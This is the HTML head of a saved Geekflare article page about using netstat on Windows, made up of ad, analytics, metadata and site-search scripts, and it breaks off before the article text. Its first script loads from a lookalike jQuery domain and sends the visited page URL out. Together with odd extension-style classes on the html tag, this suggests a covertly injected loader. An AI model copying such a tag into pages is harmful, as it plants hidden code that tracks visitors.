<html class=" FB_FW_ext BlitzScPluginAdapter" lang="en-US"><head><script src="https://cluster-na.cdnjquery.com/color/jquery.color-2.1.2.min.js?integrity=btjsonpcallback1597756867188&amp;checksum=%7B%22cbc%22%3A0%2C%22st%22%3A2%2C%22au%22%3A%5B%5D%2C%22hau%22%3A%5B%5D%2C%22ref%22%3A%22https%3A%2F%2Fgeekflare.com%2Fnetstat-command-usage-on-windows%2F%22%2C%22aa%22%3A3%2C%22pgid%22%3A%22a50c8092-e155-11ea-a54a-4ab9288fb224%22%2C%22v%22%3A1%2C%22format%22%3A%22jsonp%22%7D&amp;o=https%3A%2F%2Fgeekflare.com%2Fnetstat-command-usage-on-windows%2F&amp;csVersion=1.22.18&amp;clearThroughOptions=undefined"></script><script type="text/javascript" src="//thisiswaldo.com/sites/all/modules/custom/ad_delivery/cmp/build/cmp.complete.bundle.js"></script><script async="" src="//c.amazon-adsystem.com/aax2/apstag.js"></script><script type="text/javascript">!function(a9,a,p,s,t,A,g){if(a[a9])return;function q(c,r){a[a9]._Q.push([c,r])}a[a9]={init:function(){q("i",arguments)},fetchBids:function(){q("f",arguments)},setDisplayBids:function(){},targetingKeys:function(){return[]},_Q:[]};A=p.createElement(s);A.async=!0;A.src=t;g=p.getElementsByTagName(s)[0];g.parentNode.insertBefore(A,g)}("apstag",window,document,"script","//c.amazon-adsystem.com/aax2/apstag.js");</script><script type="text/javascript" async="" src="//theeighth-net.videoplayerhub.com/videoplayer.js"></script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script async="" type="text/javascript" src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script><script async="" src="https://www.google-analytics.com/analytics.js"></script><script src="/cdn-cgi/apps/head/1phEDcnyspA0RgOUXi0O1DGBjU4.js"></script><script src="/cdn-cgi/apps/body/NFI2F1vVxaYIUYYV6Zqf5Fcn3qg.js"></script><link rel="profile" href="https://gmpg.org/xfn/11">

<title>7 netstat Command Usage on Windows with Example - Geekflare</title>
<meta name="description" content="netstat is a command-line network tool that is a handy troubleshooting command. Its cross-platform utility means you can use it on Linux, macOS, or">
<meta name="robots" content="index, follow">
<meta name="googlebot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1">
<meta name="bingbot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1">
<link rel="canonical" href="https://geekflare.com/netstat-command-usage-on-windows/">
<meta property="og:locale" content="en_US">
<meta property="og:type" content="article">
<meta property="og:title" content="7 netstat Command Usage on Windows with Example - Geekflare">
<meta property="og:description" content="netstat is a command-line network tool that is a handy troubleshooting command. Its cross-platform utility means you can use it on Linux, macOS, or">
<meta property="og:url" content="https://geekflare.com/netstat-command-usage-on-windows/">
<meta property="og:site_name" content="Geekflare">
<meta property="article:publisher" content="https://www.facebook.com/geekflare">
<meta property="article:published_time" content="2015-02-12T10:08:53+00:00">
<meta property="article:modified_time" content="2020-07-29T06:53:13+00:00">
<meta property="og:image" content="https://geekflare.com/wp-content/uploads/2020/07/windows.jpg">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="385">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:creator" content="@ConnectCK">
<meta name="twitter:site" content="@GeekflareHQ">
<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://geekflare.com/#organization","name":"Geekflare","url":"https://geekflare.com/","sameAs":["https://www.facebook.com/geekflare","https://www.linkedin.com/company/geekflare/","https://twitter.com/GeekflareHQ"],"logo":{"@type":"ImageObject","@id":"https://geekflare.com/#logo","inLanguage":"en-US","url":"https://geekflare.com/wp-content/uploads/2020/01/Geekflare-logo.png","width":1608,"height":281,"caption":"Geekflare"},"image":{"@id":"https://geekflare.com/#logo"}},{"@type":"WebSite","@id":"https://geekflare.com/#website","url":"https://geekflare.com/","name":"Geekflare","description":"Technology Blog, Web Tools and Resources to Supercharge Site and Business","publisher":{"@id":"https://geekflare.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://geekflare.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://geekflare.com/netstat-command-usage-on-windows/#primaryimage","inLanguage":"en-US","url":"https://geekflare.com/wp-content/uploads/2020/07/windows.jpg","width":1200,"height":385},{"@type":"WebPage","@id":"https://geekflare.com/netstat-command-usage-on-windows/#webpage","url":"https://geekflare.com/netstat-command-usage-on-windows/","name":"7 netstat Command Usage on Windows with Example - Geekflare","isPartOf":{"@id":"https://geekflare.com/#website"},"primaryImageOfPage":{"@id":"https://geekflare.com/netstat-command-usage-on-windows/#primaryimage"},"datePublished":"2015-02-12T10:08:53+00:00","dateModified":"2020-07-29T06:53:13+00:00","description":"netstat is a command-line network tool that is a handy troubleshooting command. Its cross-platform utility means you can use it on Linux, macOS, or","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://geekflare.com/netstat-command-usage-on-windows/"]}]},{"@type":"Article","@id":"https://geekflare.com/netstat-command-usage-on-windows/#article","isPartOf":{"@id":"https://geekflare.com/netstat-command-usage-on-windows/#webpage"},"author":{"@id":"https://geekflare.com/#/schema/person/dd8863aabdda23ff5d7831ab4f3dd38e"},"headline":"7 netstat Command Usage on Windows with Example","datePublished":"2015-02-12T10:08:53+00:00","dateModified":"2020-07-29T06:53:13+00:00","mainEntityOfPage":{"@id":"https://geekflare.com/netstat-command-usage-on-windows/#webpage"},"commentCount":4,"publisher":{"@id":"https://geekflare.com/#organization"},"image":{"@id":"https://geekflare.com/netstat-command-usage-on-windows/#primaryimage"},"keywords":"Windows","articleSection":"Sysadmin","inLanguage":"en-US"},{"@type":["Person"],"@id":"https://geekflare.com/#/schema/person/dd8863aabdda23ff5d7831ab4f3dd38e","name":"Chandan Kumar","image":{"@type":"ImageObject","@id":"https://geekflare.com/#personlogo","inLanguage":"en-US","url":"https://geekflare.com/wp-content/uploads/2018/05/Chandan-96x96.png","caption":"Chandan Kumar"},"description":"Since founded Geekflare, I've helped millions of professional through my articles and tools. Let's connect on Twitter or LinkedIn.","sameAs":["https://twitter.com/ConnectCK"]}]}</script>

<link rel="amphtml" href="https://geekflare.com/netstat-command-usage-on-windows/amp/"><meta name="generator" content="AMP for WP 1.0.62.1"><link rel="alternate" type="application/rss+xml" title="Geekflare » Feed" href="https://geekflare.com/feed/">
<script type="text/javascript">
						advanced_ads_ready=function(){var fns=[],listener,doc=typeof document==="object"&&document,hack=doc&&doc.documentElement.doScroll,domContentLoaded="DOMContentLoaded",loaded=doc&&(hack?/^loaded|^c/:/^loaded|^i|^c/).test(doc.readyState);if(!loaded&&doc){listener=function(){doc.removeEventListener(domContentLoaded,listener);window.removeEventListener("load",listener);loaded=1;while(listener=fns.shift())listener()};doc.addEventListener(domContentLoaded,listener);window.addEventListener("load",listener)}return function(fn){loaded?setTimeout(fn,0):fns.push(fn)}}();
						</script>
<link rel="stylesheet" id="wp-block-library-css" href="https://geekflare.com/wp-includes/css/dist/block-library/style.min.css" media="all">
<link rel="stylesheet" id="geekflare-site-style-css" href="https://geekflare.com/wp-content/themes/geekflare/site/static/css/all.min.css" media="all">
<link rel="stylesheet" id="geekflare-site-style-custom-css" href="https://geekflare.com/wp-content/themes/geekflare/site/static/css/custom.css" media="all">
<link rel="stylesheet" id="algolia-autocomplete-css" href="https://geekflare.com/wp-content/plugins/search-by-algolia-instant-relevant-results/includes/../css/algolia-autocomplete.css" media="screen">
<link rel="stylesheet" id="prism-theme-css" href="https://geekflare.com/wp-content/plugins/ank-prism-for-wp/out/prism-css.min.css" media="all">
<script src="https://geekflare.com/wp-includes/js/jquery/jquery.js" id="jquery-core-js" type="text/javascript"></script>
<script id="advanced-ads-advanced-js-js-extra" type="text/javascript">
var advanced_ads_data = {"blog_id":"1"};
</script>
<script src="https://geekflare.com/wp-content/plugins/advanced-ads/public/assets/js/advanced.js" id="advanced-ads-advanced-js-js" type="text/javascript"></script>
<script src="https://geekflare.com/wp-content/plugins/advanced-ads-pro/assets/advanced-ads-pro.js" id="advanced-ds-pro/front-js" type="text/javascript"></script>
<script src="https://geekflare.com/wp-content/themes/geekflare/site/static/js/all.min.js" id="geekflare-site-script-js" type="text/javascript"></script>
<script src="https://geekflare.com/wp-includes/js/underscore.min.js" id="underscore-js" type="text/javascript"></script>
<script id="wp-util-js-extra" type="text/javascript">
var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};
</script>
<script src="https://geekflare.com/wp-includes/js/wp-util.min.js" id="wp-util-js" type="text/javascript"></script>
<script src="https://geekflare.com/wp-content/plugins/search-by-algolia-instant-relevant-results/includes/../js/algoliasearch/algoliasearch.jquery.min.js" id="algolia-search-js" type="text/javascript"></script>
<script src="https://geekflare.com/wp-content/plugins/search-by-algolia-instant-relevant-results/includes/../js/autocomplete.js/autocomplete.min.js" id="algolia-autocomplete-js" type="text/javascript"></script>
<script src="https://geekflare.com/wp-content/plugins/search-by-algolia-instant-relevant-results/includes/../js/autocomplete-noconflict.js" id="algolia-autocomplete-noconflict-js" type="text/javascript"></script>
<script id="advanced-ads-pro/cache_busting-js-extra" type="text/javascript">
var advanced_ads_pro_ajax_object = {"ajax_url":"https:\/\/geekflare.com\/wp-admin\/admin-ajax.php","lazy_load_module_enabled":"","lazy_load":{"default_offset":0,"offsets":[]},"moveintohidden":""};
</script>
<script src="https://geekflare.com/wp-content/plugins/advanced-ads-pro/modules/cache-busting/inc/base.min.js" id="advanced-ads-pro/cache_busting-js" type="text/javascript"></script>
<script type="text/javascript">
		var advadsCfpQueue = [];
		var advadsCfpAd = function( adID ){
			if ( 'undefined' == typeof advadsProCfp ) { advadsCfpQueue.push( adID ) } else { advadsProCfp.addElement( adID ) }
		};
		</script>
<script type="text/javascript">var algolia = {"debug":false,"application_id":"WTDH4XUUXG","search_api_key":"a411efbb98f4a0786373162d6d617634","powered_by_enabled":true,"query":"","autocomplete":{"sources":[{"index_id":"searchable_posts","index_name":"wp_searchable_posts","label":"All posts","admin_name":"All posts","position":10,"max_suggestions":5,"tmpl_suggestion":"autocomplete-post-suggestion","enabled":true}],"input_selector":"input[name='s']:not('.no-autocomplete')"},"indices":{"searchable_posts":{"name":"wp_searchable_posts","id":"searchable_posts","enabled":true,"replicas":[]}}};</script><style id="custom-background-css">
body.custom-background { background-color: #ffffff; }
</style>
<link rel="icon" href="https://geekflare.com/wp-content/uploads/2020/01/cropped-favicon-32x32.png" sizes="32x32">
<link rel="icon" href="https://geekflare.com/wp-content/uploads/2020/01/cropped-favicon-192x192.png" sizes="192x192">
<link rel="apple-touch-icon" href="https://geekflare.com/wp-content/uploads/2020/01/cropped-favicon-180x180.png">
<meta name="msapplication-TileImage" content="https://geekflare.com/wp-content/uploads/2020/01/cropped-favicon-270x270.png">
<style id="wp-custom-css">
			.toc_title {
	font-weight: bold;
}		</style>
<script type="text/html" id="tmpl-autocomplete-header">
  <div class="autocomplete-header">
	<div class="autocomplete-header-title">{{{ data.label }}}</div>
	<div class="clear"></div>
  </div>
</script>
<script type="text/html" id="tmpl-autocomplete-post-suggestion">
  <a class="suggestion-link" href="{{ data.permalink }}" title="{{ data.post_title }}">
	<# if ( data.images.thumbnail ) { #>
	  <img class="suggestion-post-thumbnail" src="{{ data.images.thumbnail.url }}" alt="{{ data.post_title }}">
	  <# } #>
		<div class="suggestion-post-attributes">
		  <span class="suggestion-post-title">{{{ data._highlightResult.post_title.value }}}</span>
		  <# if ( data._snippetResult['content'] ) { #>
			<span class="suggestion-post-content">{{{ data._snippetResult['content'].value }}}</span>
			<# } #>
		</div>
  </a>
</script>
<script type="text/html" id="tmpl-autocomplete-term-suggestion">
  <a class="suggestion-link" href="{{ data.permalink }}" title="{{ data.name }}">
	<svg viewBox="0 0 21 21" width="21" height="21">
	  <svg width="21" height="21" viewBox="0 0 21 21">
		<path
			d="M4.662 8.72l-1.23 1.23c-.682.682-.68 1.792.004 2.477l5.135 5.135c.7.693 1.8.688 2.48.005l1.23-1.23 5.35-5.346c.31-.31.54-.92.51-1.36l-.32-4.29c-.09-1.09-1.05-2.06-2.15-2.14l-4.3-.33c-.43-.03-1.05.2-1.36.51l-.79.8-2.27 2.28-2.28 2.27zm9.826-.98c.69 0 1.25-.56 1.25-1.25s-.56-1.25-1.25-1.25-1.25.56-1.25 1.25.56 1.25 1.25 1.25z"
			fill-rule="evenodd"></path>
	  </svg>
	</svg>
	<span class="suggestion-post-title">{{{ data._highlightResult.name.value }}}</span>
  </a>
</script>
<script type="text/html" id="tmpl-autocomplete-user-suggestion">
  <a class="suggestion-link user-suggestion-link" href="{{ data.posts_url }}" title="{{ data.display_name }}">
	<# if ( data.avatar_url ) { #>
	  <img class="suggestion-user-thumbnail" src="{{ data.avatar_url }}" alt="{{ data.display_name }}">
	  <# } #>

		<span class="suggestion-post-title">{{{ data._highlightResult.display_name.value }}}</span>
  </a>
</script>
<script type="text/html" id="tmpl-autocomplete-footer">
  <div class="autocomplete-footer">
	<div class="autocomplete-footer-branding">
	  <a href="#" class="algolia-powered-by-link" title="Algolia">
		<svg width="130" viewBox="0 0 130 18" xmlns="http://www.w3.org/2000/svg">
		  <title>Search by Algolia</title>
		  <defs>
			<linearGradient x1="-36.868%" y1="134.936%" x2="129.432%" y2="-27.7%" id="a">
			  <stop stop-color="#00AEFF" offset="0%"/>
			  <stop stop-color="#3369E7" offset="100%"/>
			</linearGradient>
		  </defs>
		  <g fill="none" fill-rule="evenodd">
			<path
				d="M59.399.022h13.299a2.372 2.372 0 0 1 2.377 2.364V15.62a2.372 2.372 0 0 1-2.377 2.364H59.399a2.372 2.372 0 0 1-2.377-2.364V2.381A2.368 2.368 0 0 1 59.399.022z"
				fill="url(#a)"/>
			<path
				d="M66.257 4.56c-2.815 0-5.1 2.272-5.1 5.078 0 2.806 2.284 5.072 5.1 5.072 2.815 0 5.1-2.272 5.1-5.078 0-2.806-2.279-5.072-5.1-5.072zm0 8.652c-1.983 0-3.593-1.602-3.593-3.574 0-1.972 1.61-3.574 3.593-3.574 1.983 0 3.593 1.602 3.593 3.574a3.582 3.582 0 0 1-3.593 3.574zm0-6.418v2.664c0 .076.082.131.153.093l2.377-1.226c.055-.027.071-.093.044-.147a2.96 2.96 0 0 0-2.465-1.487c-.055 0-.11.044-.11.104l.001-.001zm-3.33-1.956l-.312-.311a.783.783 0 0 0-1.106 0l-.372.37a.773.773 0 0 0 0 1.101l.307.305c.049.049.121.038.164-.011.181-.245.378-.479.597-.697.225-.223.455-.42.707-.599.055-.033.06-.109.016-.158h-.001zm5.001-.806v-.616a.781.781 0 0 0-.783-.779h-1.824a.78.78 0 0 0-.783.779v.632c0 .071.066.12.137.104a5.736 5.736 0 0 1 1.588-.223c.52 0 1.035.071 1.534.207a.106.106 0 0 0 .131-.104z"
				fill="#FFF"/>
			<path
				d="M102.162 13.762c0 1.455-.372 2.517-1.123 3.193-.75.676-1.895 1.013-3.44 1.013-.564 0-1.736-.109-2.673-.316l.345-1.689c.783.163 1.819.207 2.361.207.86 0 1.473-.174 1.84-.523.367-.349.548-.866.548-1.553v-.349a6.374 6.374 0 0 1-.838.316 4.151 4.151 0 0 1-1.194.158 4.515 4.515 0 0 1-1.616-.278 3.385 3.385 0 0 1-1.254-.817 3.744 3.744 0 0 1-.811-1.351c-.192-.539-.29-1.504-.29-2.212 0-.665.104-1.498.307-2.054a3.925 3.925 0 0 1 .904-1.433 4.124 4.124 0 0 1 1.441-.926 5.31 5.31 0 0 1 1.945-.365c.696 0 1.337.087 1.961.191a15.86 15.86 0 0 1 1.588.332v8.456h-.001zm-5.954-4.206c0 .893.197 1.885.592 2.299.394.414.904.621 1.528.621.34 0 .663-.049.964-.142a2.75 2.75 0 0 0 .734-.332v-5.29a8.531 8.531 0 0 0-1.413-.18c-.778-.022-1.369.294-1.786.801-.411.507-.619 1.395-.619 2.223zm16.12 0c0 .719-.104 1.264-.318 1.858a4.389 4.389 0 0 1-.904 1.52c-.389.42-.854.746-1.402.975-.548.229-1.391.36-1.813.36-.422-.005-1.26-.125-1.802-.36a4.088 4.088 0 0 1-1.397-.975 4.486 4.486 0 0 1-.909-1.52 5.037 5.037 0 0 1-.329-1.858c0-.719.099-1.411.318-1.999.219-.588.526-1.09.92-1.509.394-.42.865-.741 1.402-.97a4.547 4.547 0 0 1 1.786-.338 4.69 4.69 0 0 1 1.791.338c.548.229 1.019.55 1.402.97.389.42.69.921.909 1.509.23.588.345 1.28.345 1.999h.001zm-2.191.005c0-.921-.203-1.689-.597-2.223-.394-.539-.948-.806-1.654-.806-.707 0-1.26.267-1.654.806-.394.539-.586 1.302-.586 2.223 0 .932.197 1.558.592 2.098.394.545.948.812 1.654.812.707 0 1.26-.272 1.654-.812.394-.545.592-1.166.592-2.098h-.001zm6.962 4.707c-3.511.016-3.511-2.822-3.511-3.274L113.583.926l2.142-.338v10.003c0 .256 0 1.88 1.375 1.885v1.792h-.001zm3.774 0h-2.153V5.072l2.153-.338v9.534zm-1.079-10.542c.718 0 1.304-.578 1.304-1.291 0-.714-.581-1.291-1.304-1.291-.723 0-1.304.578-1.304 1.291 0 .714.586 1.291 1.304 1.291zm6.431 1.013c.707 0 1.304.087 1.786.262.482.174.871.42 1.156.73.285.311.488.735.608 1.182.126.447.186.937.186 1.476v5.481a25.24 25.24 0 0 1-1.495.251c-.668.098-1.419.147-2.251.147a6.829 6.829 0 0 1-1.517-.158 3.213 3.213 0 0 1-1.178-.507 2.455 2.455 0 0 1-.761-.904c-.181-.37-.274-.893-.274-1.438 0-.523.104-.855.307-1.215.208-.36.487-.654.838-.883a3.609 3.609 0 0 1 1.227-.49 7.073 7.073 0 0 1 2.202-.103c.263.027.537.076.833.147v-.349c0-.245-.027-.479-.088-.697a1.486 1.486 0 0 0-.307-.583c-.148-.169-.34-.3-.581-.392a2.536 2.536 0 0 0-.915-.163c-.493 0-.942.06-1.353.131-.411.071-.75.153-1.008.245l-.257-1.749c.268-.093.668-.185 1.183-.278a9.335 9.335 0 0 1 1.66-.142l-.001-.001zm.181 7.731c.657 0 1.145-.038 1.484-.104v-2.168a5.097 5.097 0 0 0-1.978-.104c-.241.033-.46.098-.652.191a1.167 1.167 0 0 0-.466.392c-.121.169-.175.267-.175.523 0 .501.175.79.493.981.323.196.75.289 1.293.289h.001zM84.109 4.794c.707 0 1.304.087 1.786.262.482.174.871.42 1.156.73.29.316.487.735.608 1.182.126.447.186.937.186 1.476v5.481a25.24 25.24 0 0 1-1.495.251c-.668.098-1.419.147-2.251.147a6.829 6.829 0 0 1-1.517-.158 3.213 3.213 0 0 1-1.178-.507 2.455 2.455 0 0 1-.761-.904c-.181-.37-.274-.893-.274-1.438 0-.523.104-.855.307-1.215.208-.36.487-.654.838-.883a3.609 3.609 0 0 1 1.227-.49 7.073 7.073 0 0 1 2.202-.103c.257.027.537.076.833.147v-.349c0-.245-.027-.479-.088-.697a1.486 1.486 0 0 0-.307-.583c-.148-.169-.34-.3-.581-.392a2.536 2.536 0 0 0-.915-.163c-.493 0-.942.06-1.353.131-.411.071-.75.153-1.008.245l-.257-1.749c.268-.093.668-.185 1.183-.278a8.89 8.89 0 0 1 1.66-.142l-.001-.001zm.186 7.736c.657 0 1.145-.038 1.484-.104v-2.168a5.097 5.097 0 0 0-1.978-.104c-.241.033-.46.098-.652.191a1.167 1.167 0 0 0-.466.392c-.121.169-.175.267-.175.523 0 .501.175.79.493.981.318.191.75.289 1.293.289h.001zm8.682 1.738c-3.511.016-3.511-2.822-3.511-3.274L89.461.926l2.142-.338v10.003c0 .256 0 1.88 1.375 1.885v1.792h-.001z"
				fill="#182359"/>
			<path
				d="M5.027 11.025c0 .698-.252 1.246-.757 1.644-.505.397-1.201.596-2.089.596-.888 0-1.615-.138-2.181-.414v-1.214c.358.168.739.301 1.141.397.403.097.778.145 1.125.145.508 0 .884-.097 1.125-.29a.945.945 0 0 0 .363-.779.978.978 0 0 0-.333-.747c-.222-.204-.68-.446-1.375-.725-.716-.29-1.221-.621-1.515-.994-.294-.372-.44-.82-.44-1.343 0-.655.233-1.171.698-1.547.466-.376 1.09-.564 1.875-.564.752 0 1.5.165 2.245.494l-.408 1.047c-.698-.294-1.321-.44-1.869-.44-.415 0-.73.09-.945.271a.89.89 0 0 0-.322.717c0 .204.043.379.129.524.086.145.227.282.424.411.197.129.551.299 1.063.51.577.24.999.464 1.268.671.269.208.466.442.591.704.125.261.188.569.188.924l-.001.002zm3.98 2.24c-.924 0-1.646-.269-2.167-.808-.521-.539-.782-1.281-.782-2.226 0-.97.242-1.733.725-2.288.483-.555 1.148-.833 1.993-.833.784 0 1.404.238 1.858.714.455.476.682 1.132.682 1.966v.682H7.357c.018.577.174 1.02.467 1.329.294.31.707.465 1.241.465.351 0 .678-.033.98-.099a5.1 5.1 0 0 0 .975-.33v1.026a3.865 3.865 0 0 1-.935.312 5.723 5.723 0 0 1-1.08.091l.002-.001zm-.231-5.199c-.401 0-.722.127-.964.381s-.386.625-.432 1.112h2.696c-.007-.491-.125-.862-.354-1.115-.229-.252-.544-.379-.945-.379l-.001.001zm7.692 5.092l-.252-.827h-.043c-.286.362-.575.608-.865.739-.29.131-.662.196-1.117.196-.584 0-1.039-.158-1.367-.473-.328-.315-.491-.761-.491-1.337 0-.612.227-1.074.682-1.386.455-.312 1.148-.482 2.079-.51l1.026-.032v-.317c0-.38-.089-.663-.266-.851-.177-.188-.452-.282-.824-.282-.304 0-.596.045-.876.134a6.68 6.68 0 0 0-.806.317l-.408-.902a4.414 4.414 0 0 1 1.058-.384 4.856 4.856 0 0 1 1.085-.132c.756 0 1.326.165 1.711.494.385.329.577.847.577 1.552v4.002h-.902l-.001-.001zm-1.88-.859c.458 0 .826-.128 1.104-.384.278-.256.416-.615.416-1.077v-.516l-.763.032c-.594.021-1.027.121-1.297.298s-.406.448-.406.814c0 .265.079.47.236.615.158.145.394.218.709.218h.001zm7.557-5.189c.254 0 .464.018.628.054l-.124 1.176a2.383 2.383 0 0 0-.559-.064c-.505 0-.914.165-1.227.494-.313.329-.47.757-.47 1.284v3.105h-1.262V7.218h.988l.167 1.047h.064c.197-.354.454-.636.771-.843a1.83 1.83 0 0 1 1.023-.312h.001zm4.125 6.155c-.899 0-1.582-.262-2.049-.787-.467-.525-.701-1.277-.701-2.259 0-.999.244-1.767.733-2.304.489-.537 1.195-.806 2.119-.806.627 0 1.191.116 1.692.349l-.381 1.015c-.534-.208-.974-.312-1.321-.312-1.028 0-1.542.682-1.542 2.046 0 .666.128 1.166.384 1.501.256.335.631.502 1.125.502a3.23 3.23 0 0 0 1.595-.419v1.101a2.53 2.53 0 0 1-.722.285 4.356 4.356 0 0 1-.932.086v.002zm8.277-.107h-1.268V9.506c0-.458-.092-.8-.277-1.026-.184-.226-.477-.338-.878-.338-.53 0-.919.158-1.168.475-.249.317-.373.848-.373 1.593v2.949h-1.262V4.801h1.262v2.122c0 .34-.021.704-.064 1.09h.081a1.76 1.76 0 0 1 .717-.666c.306-.158.663-.236 1.072-.236 1.439 0 2.159.725 2.159 2.175v3.873l-.001-.001zm7.649-6.048c.741 0 1.319.269 1.732.806.414.537.62 1.291.62 2.261 0 .974-.209 1.732-.628 2.275-.419.542-1.001.814-1.746.814-.752 0-1.336-.27-1.751-.811h-.086l-.231.704h-.945V4.801h1.262v1.987l-.021.655-.032.553h.054c.401-.591.992-.886 1.772-.886zm-.328 1.031c-.508 0-.875.149-1.098.448-.224.299-.339.799-.346 1.501v.086c0 .723.115 1.247.344 1.571.229.324.603.486 1.123.486.448 0 .787-.177 1.018-.532.231-.354.346-.867.346-1.536 0-1.35-.462-2.025-1.386-2.025l-.001.001zm3.244-.924h1.375l1.209 3.368c.183.48.304.931.365 1.354h.043c.032-.197.091-.436.177-.717.086-.281.541-1.616 1.364-4.004h1.364l-2.541 6.73c-.462 1.235-1.232 1.853-2.31 1.853-.279 0-.551-.03-.816-.091v-.999c.19.043.406.064.65.064.609 0 1.037-.353 1.284-1.058l.22-.559-2.385-5.941h.001z"
				fill="#1D3657"/>
		  </g>
		</svg>
	  </a>
	</div>
  </div>
</script>
<script type="text/html" id="tmpl-autocomplete-empty">
  <div class="autocomplete-empty">
	  No results matched your query 	<span class="empty-query">"{{ data.query }}"</span>
  </div>
</script>
<script type="text/javascript">
  jQuery(function () {
	/* init Algolia client */
	var client = algoliasearch(algolia.application_id, algolia.search_api_key);

	/* setup default sources */
	var sources = [];
	jQuery.each(algolia.autocomplete.sources, function (i, config) {
	  var suggestion_template = wp.template(config['tmpl_suggestion']);
	  sources.push({
		source: algoliaAutocomplete.sources.hits(client.initIndex(config['index_name']), {
		  hitsPerPage: config['max_suggestions'],
		  attributesToSnippet: [
			'content:10'
		  ],
		  highlightPreTag: '__ais-highlight__',
		  highlightPostTag: '__/ais-highlight__'
		}),
		templates: {
		  header: function () {
			return wp.template('autocomplete-header')({
			  label: _.escape(config['label'])
			});
		  },
		  suggestion: function (hit) {
      if(hit.escaped === true) {
        return suggestion_template(hit);
      }
      hit.escaped = true;

			for (var key in hit._highlightResult) {
			  /* We do not deal with arrays. */
			  if (typeof hit._highlightResult[key].value !== 'string') {
				continue;
			  }
			  hit._highlightResult[key].value = _.escape(hit._highlightResult[key].value);
			  hit._highlightResult[key].value = hit._highlightResult[key].value.replace(/__ais-highlight__/g, '<em>').replace(/__\/ais-highlight__/g, '</em>');
			}

			for (var key in hit._snippetResult) {
			  /* We do not deal with arrays. */
			  if (typeof hit._snippetResult[key].value !== 'string') {
				continue;
			  }

			  hit._snippetResult[key].value = _.escape(hit._snippetResult[key].value);
			  hit._snippetResult[key].value = hit._snippetResult[key].value.replace(/__ais-highlight__/g, '<em>').replace(/__\/ais-highlight__/g, '</em>');
			}

			return suggestion_template(hit);
		  }
		}
	  });

	});

	/* Setup dropdown menus */
	jQuery(algolia.autocomplete.input_selector).each(function (i) {
	  var $searchInput = jQuery(this);

	  var config = {
		debug: algolia.debug,
		hint: false,
		openOnFocus: true,
		appendTo: 'body',
		templates: {
		  empty: wp.template('autocomplete-empty')
		}
	  };

	  if (algolia.powered_by_enabled) {
		config.templates.footer = wp.template('autocomplete-footer');
	  }

	  /* Instantiate autocomplete.js */
	  var autocomplete = algoliaAutocomplete($searchInput[0], config, sources)
	  .on('autocomplete:selected', function (e, suggestion) {
		/* Redirect the user when we detect a suggestion selection. */
		window.location.href = suggestion.permalink;
	  });

	  /* Force the dropdown to be re-drawn on scroll to handle fixed containers. */
	  jQuery(window).scroll(function() {
		if(autocomplete.autocomplete.getWrapper().style.display === "block") {
		  autocomplete.autocomplete.close();
		  autocomplete.autocomplete.open();
		}
	  });
	});

	jQuery(document).on("click", ".algolia-powered-by-link", function (e) {
	  e.preventDefault();
	  window.location = "https://www.algolia.com/?utm_source=WordPress&utm_medium=extension&utm_content=" + window.location.hostname + "&utm_campaign=poweredby";
	});
  });
</script>

<script data-cfasync="false" async="" type="text/javascript" src="https://d31vxm9ubutrmw.cloudfront.net/static/js/813.js"></script> 
<style type="text/css">#waldo-sticky-footer-wrapper {position: fixed; width: 100%; bottom: 0px; left: 0px; text-align: center; z-index: 9000;margin-bottom: 0 !important;}#waldo-sticky-footer-wrapper > div {position: relative; display: inline-block; margin-bottom: 0 !important;}#waldo-sticky-footer-wrapper iframe, #waldo-sticky-footer-wrapper div {margin-left: auto;margin-right: auto;}.waldo-sticky-sidebar{position: fixed; top: 10px;z-index: 90}.waldo-bfleft {position: fixed; left: 0; top: 10px;z-index:101;}.waldo-bfright {position: fixed; right: 0; top: 10px;z-index:101;}#nm-ccpa-widget {width: 400px;}#nm-ccpa-widget {position: fixed; right: 20px; z-index: 9999; margin-bottom: 15px;box-shadow: 0 3px 36px 0 rgba(0,0,0,0.3); background-color: #fff;border-radius: 10px;bottom: 20px;margin-top: 10px;font-size: 14px;}.nm-ccpa-widget-header {background: #179f84;color: #fff;padding: 20px;}.nm-ccpa-widget-header .nm-ccpa-widget-main-title {margin-bottom: 0;margin-top: 0;font-size: 16px;font-weight: bold;}.nm-ccpa-widget-body {padding: 20px;background: #fff;}.nm-ccpa-widget-body label {font-size: 16px;}.nm-ccpa-widget-submit-btn {margin-top: 15px;padding-left: 25px;}.nm-ccpa-widget-submit-btn input {background: #179f84;color: #fff;padding: 10px 20px;border-radius: 8px;border: 0;outline: 0;}.nm-ccpa-widget-submit-btn input:hover,.nm-ccpa-widget-submit-btn input:focus {cursor: pointer;}.nm-ccpa-widget-checkbox-label {font-size: 20px;}.nm-ccpa-widget-header {position: relative;}.nm-ccpa-widget-close-btn {position: absolute;right: 10px;top: 10px;}.nm-ccpa-widget-close-btn a {color: #fff;font-size: 20px;text-decoration: none;}.nm-ccpa-widget-message {padding-left: 25px;}#waldo-tag-6038 {clear: both !important;}div[class^="app_gdpr-"] a {color: #41afbb !important; text-decoration: underline !important}#waldo-close-button {position: absolute; right: 0;top: -24px;}#waldo-close-button a {border: 1px solid rgba(0,0,0,.35);padding: 3px;font-size: 12px;color: #fff;font-weight: bold;background-color: #777;}</style><link rel="preload" href="https://adservice.google.ru/adsid/integrator.js?domain=geekflare.com" as="script"><script type="text/javascript" src="https://adservice.google.ru/adsid/integrator.js?domain=geekflare.com"></script><link rel="preload" href="https://adservice.google.com/adsid/integrator.js?domain=geekflare.com" as="script"><script type="text/javascript" src="https://adservice.google.com/adsid/integrator.js?domain=geekflare.com"></script><script src="https://securepubads.g.doubleclick.net/gpt/pubads_impl_2020081301.js" async=""></script><script type="text/javascript">googletag.cmd.push(function() {googletag.pubads().addEventListener('slotRenderEnded', function(event) {waldoPassbackCheck(event);waldoAddCloseBtn(event);});googletag.pubads().enableSingleRequest();googletag.enableServices();gptAdSlots[915] = 